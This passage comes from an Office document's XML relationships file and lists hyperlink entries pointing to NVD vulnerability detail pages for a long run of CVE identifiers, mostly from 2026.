/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64374" TargetMode="External" Id="rId1061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66373" TargetMode="External" Id="rId1062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67422" TargetMode="External" Id="rId1063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68887" TargetMode="External" Id="rId1064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69222" TargetMode="External" Id="rId1065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69342" TargetMode="External" Id="rId1066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69378" TargetMode="External" Id="rId1067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69397" TargetMode="External" Id="rId1068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69428" TargetMode="External" Id="rId1069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69429" TargetMode="External" Id="rId1070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69443" TargetMode="External" Id="rId1071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69514" TargetMode="External" Id="rId1072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69539" TargetMode="External" Id="rId1073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69587" TargetMode="External" Id="rId1074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69588" TargetMode="External" Id="rId1075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69599" TargetMode="External" Id="rId1076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69607" TargetMode="External" Id="rId1077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69631" TargetMode="External" Id="rId1078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69710" TargetMode="External" Id="rId1079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69739" TargetMode="External" Id="rId1080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69744" TargetMode="External" Id="rId1081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69760" TargetMode="External" Id="rId1082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69793" TargetMode="External" Id="rId1083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69803" TargetMode="External" Id="rId1084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69804" TargetMode="External" Id="rId1085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69805" TargetMode="External" Id="rId1086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69809" TargetMode="External" Id="rId1087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69852" TargetMode="External" Id="rId1088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69881" TargetMode="External" Id="rId1089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69890" TargetMode="External" Id="rId1090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69929" TargetMode="External" Id="rId1091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69930" TargetMode="External" Id="rId1092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70065" TargetMode="External" Id="rId1093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70124" TargetMode="External" Id="rId1094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70570" TargetMode="External" Id="rId1095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70579" TargetMode="External" Id="rId1096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70587" TargetMode="External" Id="rId1097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70601" TargetMode="External" Id="rId1098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71092" TargetMode="External" Id="rId1099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71330" TargetMode="External" Id="rId1100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72923" TargetMode="External" Id="rId1101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72928" TargetMode="External" Id="rId1102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72932" TargetMode="External" Id="rId1103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72943" TargetMode="External" Id="rId1104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72949" TargetMode="External" Id="rId1105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72954" TargetMode="External" Id="rId1106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72989" TargetMode="External" Id="rId1107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73017" TargetMode="External" Id="rId1108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73088" TargetMode="External" Id="rId1109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73089" TargetMode="External" Id="rId1110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73246" TargetMode="External" Id="rId1111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73507" TargetMode="External" Id="rId1112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73561" TargetMode="External" Id="rId1113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74761" TargetMode="External" Id="rId1114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75328" TargetMode="External" Id="rId1115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76098" TargetMode="External" Id="rId1116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77384" TargetMode="External" Id="rId1117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77438" TargetMode="External" Id="rId1118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77465" TargetMode="External" Id="rId1119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77494" TargetMode="External" Id="rId1120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77498" TargetMode="External" Id="rId1121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77499" TargetMode="External" Id="rId1122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77501" TargetMode="External" Id="rId1123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77502" TargetMode="External" Id="rId1124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77886" TargetMode="External" Id="rId1125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77888" TargetMode="External" Id="rId1126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77889" TargetMode="External" Id="rId1127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77890" TargetMode="External" Id="rId1128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77893" TargetMode="External" Id="rId1129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77895" TargetMode="External" Id="rId1130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77898" TargetMode="External" Id="rId1131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78523" TargetMode="External" Id="rId1132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78543" TargetMode="External" Id="rId1133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78574" TargetMode="External" Id="rId1134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80229" TargetMode="External" Id="rId1135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80924" TargetMode="External" Id="rId1136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81265" TargetMode="External" Id="rId1137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81270" TargetMode="External" Id="rId1138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82397" TargetMode="External" Id="rId1139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83989" TargetMode="External" Id="rId1140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84001" TargetMode="External" Id="rId1141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84219" TargetMode="External" Id="rId1142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84375" TargetMode="External" Id="rId1143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84382" TargetMode="External" Id="rId1144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84469" TargetMode="External" Id="rId1145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86093" TargetMode="External" Id="rId1146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87776" TargetMode="External" Id="rId1147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87908" TargetMode="External" Id="rId1148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8862" TargetMode="External" Id="rId1149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18489" TargetMode="External" Id="rId1150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19651" TargetMode="External" Id="rId1151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32589" TargetMode="External" Id="rId1152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42033" TargetMode="External" Id="rId1153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48084" TargetMode="External" Id="rId1154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48526" TargetMode="External" Id="rId1155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54550" TargetMode="External" Id="rId1156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62906" TargetMode="External" Id="rId1157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69347" TargetMode="External" Id="rId1158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70604" TargetMode="External" Id="rId1159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73086" TargetMode="External" Id="rId1160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78254" TargetMode="External" Id="rId1161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80434" TargetMode="External" Id="rId1162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81383" TargetMode="External" Id="rId1163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84003" TargetMode="External" Id="rId1164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84366" TargetMode="External" Id="rId1165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85525" TargetMode="External" Id="rId1166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87812" TargetMode="External" Id="rId1167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13201" TargetMode="External" Id="rId1168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28613" TargetMode="External" Id="rId1169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28626" TargetMode="External" Id="rId1170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28656" TargetMode="External" Id="rId1171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40542" TargetMode="External" Id="rId1172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41605" TargetMode="External" Id="rId1173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43869" TargetMode="External" Id="rId1174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44185" TargetMode="External" Id="rId1175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45528" TargetMode="External" Id="rId1176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47878" TargetMode="External" Id="rId1177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63404" TargetMode="External" Id="rId1178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67326" TargetMode="External" Id="rId1179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69097" TargetMode="External" Id="rId1180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69477" TargetMode="External" Id="rId1181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75857" TargetMode="External" Id="rId1182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78627" TargetMode="External" Id="rId1183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85028" TargetMode="External" Id="rId1184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88885" TargetMode="External" Id="rId1185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88888" TargetMode="External" Id="rId1186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0310" TargetMode="External" Id="rId1187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19769" TargetMode="External" Id="rId1188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27459" TargetMode="External" Id="rId1189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41567" TargetMode="External" Id="rId1190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45019" TargetMode="External" Id="rId1191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70608" TargetMode="External" Id="rId1192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73624" TargetMode="External" Id="rId1193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81349" TargetMode="External" Id="rId1194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82071" TargetMode="External" Id="rId1195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84387" TargetMode="External" Id="rId1196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-14047" TargetMode="External" Id="rId1197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17627" TargetMode="External" Id="rId1198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18737" TargetMode="External" Id="rId1199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19671" TargetMode="External" Id="rId1200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20293" TargetMode="External" Id="rId1201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48494" TargetMode="External" Id="rId1202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54085" TargetMode="External" Id="rId1203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55520" TargetMode="External" Id="rId1204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55673" TargetMode="External" Id="rId1205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62680" TargetMode="External" Id="rId1206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63177" TargetMode="External" Id="rId1207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64379" TargetMode="External" Id="rId1208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64816" TargetMode="External" Id="rId1209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66003" TargetMode="External" Id="rId1210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68553" TargetMode="External" Id="rId1211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68835" TargetMode="External" Id="rId1212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68846" TargetMode="External" Id="rId1213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68889" TargetMode="External" Id="rId1214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68893" TargetMode="External" Id="rId1215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69244" TargetMode="External" Id="rId1216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69272" TargetMode="External" Id="rId1217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69274" TargetMode="External" Id="rId1218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69296" TargetMode="External" Id="rId1219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69305" TargetMode="External" Id="rId1220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69313" TargetMode="External" Id="rId1221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69314" TargetMode="External" Id="rId1222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69336" TargetMode="External" Id="rId1223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69337" TargetMode="External" Id="rId1224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69340" 